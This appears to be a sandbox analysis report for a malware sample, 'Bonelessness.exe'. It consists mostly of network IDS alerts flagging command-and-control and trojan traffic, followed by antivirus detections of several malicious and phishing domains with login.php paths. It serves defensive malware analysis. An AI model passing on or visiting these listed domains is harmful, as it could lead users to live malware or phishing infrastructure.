      Timestamp:2024-08-23T18:47:52.479234+0200
      SID:2803437
      Severity:1
      Source Port:64283
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.479234+0200
      SID:2804852
      Severity:1
      Source Port:64283
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.793758+0200
      SID:2018141
      Severity:1
      Source Port:80
      Destination Port:49652
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:01.793758+0200
      SID:2037771
      Severity:1
      Source Port:80
      Destination Port:49652
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:48:59.360466+0200
      SID:2803437
      Severity:1
      Source Port:56391
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.360466+0200
      SID:2804852
      Severity:1
      Source Port:56391
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:21.509420+0200
      SID:2804852
      Severity:1
      Source Port:51121
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:01.919618+0200
      SID:2803437
      Severity:1
      Source Port:56398
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:01.919618+0200
      SID:2804852
      Severity:1
      Source Port:56398
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.648362+0200
      SID:2803437
      Severity:1
      Source Port:64302
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.648362+0200
      SID:2804852
      Severity:1
      Source Port:64302
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:03.985127+0200
      SID:2803437
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:03.985127+0200
      SID:2804852
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.281482+0200
      SID:2803437
      Severity:1
      Source Port:56388
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.281482+0200
      SID:2804852
      Severity:1
      Source Port:56388
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.413638+0200
      SID:2803437
      Severity:1
      Source Port:56388
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.413638+0200
      SID:2804852
      Severity:1
      Source Port:56388
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:36.458145+0200
      SID:2803437
      Severity:1
      Source Port:51122
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:36.458145+0200
      SID:2804852
      Severity:1
      Source Port:51122
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.818588+0200
      SID:2803437
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.818588+0200
      SID:2804852
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:42.176201+0200
      SID:2803437
      Severity:1
      Source Port:50751
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:42.176201+0200
      SID:2804852
      Severity:1
      Source Port:50751
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.323898+0200
      SID:2803437
      Severity:1
      Source Port:56383
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.323898+0200
      SID:2804852
      Severity:1
      Source Port:56383
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:39.441428+0200
      SID:2803437
      Severity:1
      Source Port:51130
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:39.441428+0200
      SID:2804852
      Severity:1
      Source Port:51130
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.921822+0200
      SID:2803437
      Severity:1
      Source Port:56395
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.921822+0200
      SID:2804852
      Severity:1
      Source Port:56395
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.202984+0200
      SID:2803437
      Severity:1
      Source Port:64273
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.202984+0200
      SID:2804852
      Severity:1
      Source Port:64273
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.520199+0200
      SID:2018141
      Severity:1
      Source Port:80
      Destination Port:60209
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:01.520199+0200
      SID:2037771
      Severity:1
      Source Port:80
      Destination Port:60209
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:52.358805+0200
      SID:2804852
      Severity:1
      Source Port:64278
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:51.936053+0200
      SID:2803437
      Severity:1
      Source Port:50116
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:51.936053+0200
      SID:2804852
      Severity:1
      Source Port:50116
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:53.392700+0200
      SID:2803437
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:53.392700+0200
      SID:2804852
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.393681+0200
      SID:2803437
      Severity:1
      Source Port:51128
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.393681+0200
      SID:2804852
      Severity:1
      Source Port:51128
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:16.822889+0200
      SID:2803437
      Severity:1
      Source Port:49663
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:16.822889+0200
      SID:2804852
      Severity:1
      Source Port:49663
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.597286+0200
      SID:2803437
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.597286+0200
      SID:2804852
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:04.530284+0200
      SID:2804852
      Severity:1
      Source Port:49661
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.778689+0200
      SID:2803437
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.778689+0200
      SID:2804852
      Severity:1
      Source Port:49735
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:11.489069+0200
      SID:2803437
      Severity:1
      Source Port:64284
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:11.489069+0200
      SID:2804852
      Severity:1
      Source Port:64284
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:20.835861+0200
      SID:2803437
      Severity:1
      Source Port:49663
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:20.835861+0200
      SID:2804852
      Severity:1
      Source Port:49663
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.316287+0200
      SID:2803437
      Severity:1
      Source Port:64300
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.316287+0200
      SID:2804852
      Severity:1
      Source Port:64300
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.143521+0200
      SID:2803437
      Severity:1
      Source Port:64277
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.143521+0200
      SID:2804852
      Severity:1
      Source Port:64277
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.867558+0200
      SID:2803437
      Severity:1
      Source Port:64292
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.867558+0200
      SID:2804852
      Severity:1
      Source Port:64292
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.793323+0200
      SID:2803437
      Severity:1
      Source Port:49652
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.793323+0200
      SID:2804852
      Severity:1
      Source Port:49652
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:01.437661+0200
      SID:2804852
      Severity:1
      Source Port:56397
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:41.579995+0200
      SID:2803437
      Severity:1
      Source Port:50750
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:41.579995+0200
      SID:2804852
      Severity:1
      Source Port:50750
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.222909+0200
      SID:2803437
      Severity:1
      Source Port:56384
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.222909+0200
      SID:2804852
      Severity:1
      Source Port:56384
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.662556+0200
      SID:2803437
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.662556+0200
      SID:2804852
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.953230+0200
      SID:2803437
      Severity:1
      Source Port:64271
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.953230+0200
      SID:2804852
      Severity:1
      Source Port:64271
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.714787+0200
      SID:2803437
      Severity:1
      Source Port:51129
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.714787+0200
      SID:2804852
      Severity:1
      Source Port:51129
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.316430+0200
      SID:2803437
      Severity:1
      Source Port:64291
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.316430+0200
      SID:2804852
      Severity:1
      Source Port:64291
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:03.680235+0200
      SID:2804852
      Severity:1
      Source Port:56400
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.938477+0200
      SID:2803437
      Severity:1
      Source Port:64274
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.938477+0200
      SID:2804852
      Severity:1
      Source Port:64274
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:04.229267+0200
      SID:2803437
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:04.229267+0200
      SID:2804852
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.471543+0200
      SID:2803437
      Severity:1
      Source Port:49734
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.471543+0200
      SID:2804852
      Severity:1
      Source Port:49734
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.607947+0200
      SID:2803437
      Severity:1
      Source Port:49732
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.607947+0200
      SID:2804852
      Severity:1
      Source Port:49732
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.424615+0200
      SID:2803437
      Severity:1
      Source Port:56384
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.424615+0200
      SID:2804852
      Severity:1
      Source Port:56384
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.226341+0200
      SID:2803437
      Severity:1
      Source Port:56387
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.226341+0200
      SID:2804852
      Severity:1
      Source Port:56387
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:15.205704+0200
      SID:2803437
      Severity:1
      Source Port:49658
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:15.205704+0200
      SID:2804852
      Severity:1
      Source Port:49658
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.882748+0200
      SID:2803437
      Severity:1
      Source Port:49653
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.882748+0200
      SID:2804852
      Severity:1
      Source Port:49653
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.250436+0200
      SID:2803437
      Severity:1
      Source Port:56394
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.250436+0200
      SID:2804852
      Severity:1
      Source Port:56394
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.929926+0200
      SID:2803437
      Severity:1
      Source Port:64272
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.929926+0200
      SID:2804852
      Severity:1
      Source Port:64272
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:02.104297+0200
      SID:2803437
      Severity:1
      Source Port:56399
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:02.104297+0200
      SID:2804852
      Severity:1
      Source Port:56399
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:53.751639+0200
      SID:2803437
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:53.751639+0200
      SID:2804852
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.145020+0200
      SID:2803437
      Severity:1
      Source Port:56385
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:00.145020+0200
      SID:2804852
      Severity:1
      Source Port:56385
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:03.182843+0200
      SID:2803437
      Severity:1
      Source Port:56385
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:03.182843+0200
      SID:2804852
      Severity:1
      Source Port:56385
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:47.291874+0200
      SID:2803437
      Severity:1
      Source Port:63803
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:47.291874+0200
      SID:2804852
      Severity:1
      Source Port:63803
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:00.273297+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:53004
      Protocol:UDP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:51.839405+0200
      SID:2803437
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.839405+0200
      SID:2804852
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.203452+0200
      SID:2803437
      Severity:1
      Source Port:64298
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.203452+0200
      SID:2804852
      Severity:1
      Source Port:64298
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.747669+0200
      SID:2018141
      Severity:1
      Source Port:80
      Destination Port:49651
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:01.747669+0200
      SID:2037771
      Severity:1
      Source Port:80
      Destination Port:49651
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-08-23T18:47:04.673377+0200
      SID:2803437
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:04.673377+0200
      SID:2804852
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:28.799086+0200
      SID:2803437
      Severity:1
      Source Port:64290
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:28.799086+0200
      SID:2804852
      Severity:1
      Source Port:64290
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:39.716171+0200
      SID:2803437
      Severity:1
      Source Port:64299
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:39.716171+0200
      SID:2804852
      Severity:1
      Source Port:64299
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.233027+0200
      SID:2803437
      Severity:1
      Source Port:56386
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.233027+0200
      SID:2804852
      Severity:1
      Source Port:56386
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.639004+0200
      SID:2803437
      Severity:1
      Source Port:64301
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.639004+0200
      SID:2804852
      Severity:1
      Source Port:64301
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.185426+0200
      SID:2803437
      Severity:1
      Source Port:51124
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:38.185426+0200
      SID:2804852
      Severity:1
      Source Port:51124
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:26.313142+0200
      SID:2803437
      Severity:1
      Source Port:64292
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:26.313142+0200
      SID:2804852
      Severity:1
      Source Port:64292
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:19.476260+0200
      SID:2803437
      Severity:1
      Source Port:51112
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:19.476260+0200
      SID:2804852
      Severity:1
      Source Port:51112
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:49.946120+0200
      SID:2803437
      Severity:1
      Source Port:63308
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:49.946120+0200
      SID:2804852
      Severity:1
      Source Port:63308
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.973905+0200
      SID:2803437
      Severity:1
      Source Port:64303
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:36.973905+0200
      SID:2804852
      Severity:1
      Source Port:64303
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.546324+0200
      SID:2803437
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:51.546324+0200
      SID:2804852
      Severity:1
      Source Port:49733
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:50.293064+0200
      SID:2803437
      Severity:1
      Source Port:64306
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:50.293064+0200
      SID:2804852
      Severity:1
      Source Port:64306
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.339923+0200
      SID:2803437
      Severity:1
      Source Port:56390
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:59.339923+0200
      SID:2804852
      Severity:1
      Source Port:56390
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:54.165366+0200
      SID:2803437
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:54.165366+0200
      SID:2804852
      Severity:1
      Source Port:49660
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:25.891710+0200
      SID:2803437
      Severity:1
      Source Port:49662
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:25.891710+0200
      SID:2804852
      Severity:1
      Source Port:49662
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.518998+0200
      SID:2803437
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:01.518998+0200
      SID:2804852
      Severity:1
      Source Port:49731
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:31.622568+0200
      SID:2803437
      Severity:1
      Source Port:64289
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:31.622568+0200
      SID:2804852
      Severity:1
      Source Port:64289
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:23.528835+0200
      SID:2803437
      Severity:1
      Source Port:64288
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:23.528835+0200
      SID:2804852
      Severity:1
      Source Port:64288
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:24.959067+0200
      SID:2804852
      Severity:1
      Source Port:64293
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.370944+0200
      SID:2804852
      Severity:1
      Source Port:49656
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:02.126233+0200
      SID:2804852
      Severity:1
      Source Port:49654
      Destination Port:443
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:17.469876+0200
      SID:2803437
      Severity:1
      Source Port:51112
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:17.469876+0200
      SID:2804852
      Severity:1
      Source Port:51112
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.109062+0200
      SID:2803437
      Severity:1
      Source Port:64275
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:47:52.109062+0200
      SID:2804852
      Severity:1
      Source Port:64275
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:01.672638+0200
      SID:2803437
      Severity:1
      Source Port:56399
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:49:01.672638+0200
      SID:2804852
      Severity:1
      Source Port:56399
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:35.640695+0200
      SID:2803437
      Severity:1
      Source Port:64297
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:35.640695+0200
      SID:2804852
      Severity:1
      Source Port:64297
      Destination Port:80
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-08-23T18:48:57.938393+0200
      SID:2021022
      Severity:1
      Source Port:53
      Destination Port:53545
      Protocol:UDP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Bonelessness.exeAvira: detected
      Source: http://lyrysor.com/login.phpAvira URL Cloud: Label: phishing
      Source: http://gadyniw.com/login.phpMyAvira URL Cloud: Label: malware
      Source: http://lyvyxor.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galynuh.com/login.php.Avira URL Cloud: Label: malware
      Source: http://galyqaz.com/Personals.cfm?fp=SW2zOGluRjzYOmr3oBHHfKLjoB3z%2FhRVuwyTtS%2BUGtsEGsOf%2BBeruClQxvAvira URL Cloud: Label: malware
      Source: http://puzylyp.com/login.phpAvira URL Cloud: Label: malware
      Source: http://vojyqem.com/login.phpTempAvira URL Cloud: Label: malware
      Source: http://galynuh.com/login.phpAvira URL Cloud: Label: malware
      Source: http://lyxynyx.com/login.phpAvira URL Cloud: Label: malware
      Source: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&Avira URL Cloud: Label: malware
      Source: http://qetyhyg.com/login.phpAvira URL Cloud: Label: phishing
      Source: http://lymyxid.com/login.phpAvira URL Cloud: Label: malware
      Source: http://galyqaz.com/display.cfmAvira URL Cloud: Label: malware
      Source: http://vojyqem.com/login.phpAvira URL Cloud: Label: malware
      Source: http://puzylyp.com/login.phpMyAvira URL Cloud: Label: malware
      Source: http://qegyval.com/login.phpAvira URL Cloud: Label: malware
      Source: http://vocyzit.com/loginAvira URL Cloud: Label: malware
